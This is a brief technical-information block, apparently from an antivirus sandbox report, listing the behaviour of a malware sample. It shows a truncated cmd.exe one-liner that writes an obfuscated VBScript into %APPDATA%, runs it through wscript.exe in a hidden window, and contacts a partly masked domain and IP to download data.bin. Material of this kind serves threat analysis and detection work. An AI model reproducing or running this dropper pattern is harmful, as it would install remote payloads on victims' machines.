Техническая информация
- '<SYSTEM32>\cmd.exe' /V /C set "Og6=%APPDATA%\%RANDOM%.vbs" && (for %i in ("Dim IDZgi" "RUS9=90" "QO" "FuNction OC6Mtl()" "WXIJZL3=10" "OC6Mtl=sECOND(tIME)" "UktTXA=53" "enD fUNctIoN" "fUNcTion YR(VYge5O)" "YHLtGWJ...
- %APPDATA%\20518.vbs
- 'pa###louf.com':80
- '20#.#7.8.251':80
- http://pa###louf.com/data.bin
- DNS ASK pa###louf.com
- '<SYSTEM32>\wscript.exe' "%APPDATA%\20518.vbs"
- '<SYSTEM32>\cmd.exe' /V /C set "Og6=%APPDATA%\%RANDOM%.vbs" && (for %i in ("Dim IDZgi" "RUS9=90" "QO" "FuNction OC6Mtl()" "WXIJZL3=10" "OC6Mtl=sECOND(tIME)" "UktTXA=53" "enD fUNctIoN" "fUNcTion YR(VYge5O)" "YHLtGWJ...' (со скрытым окном)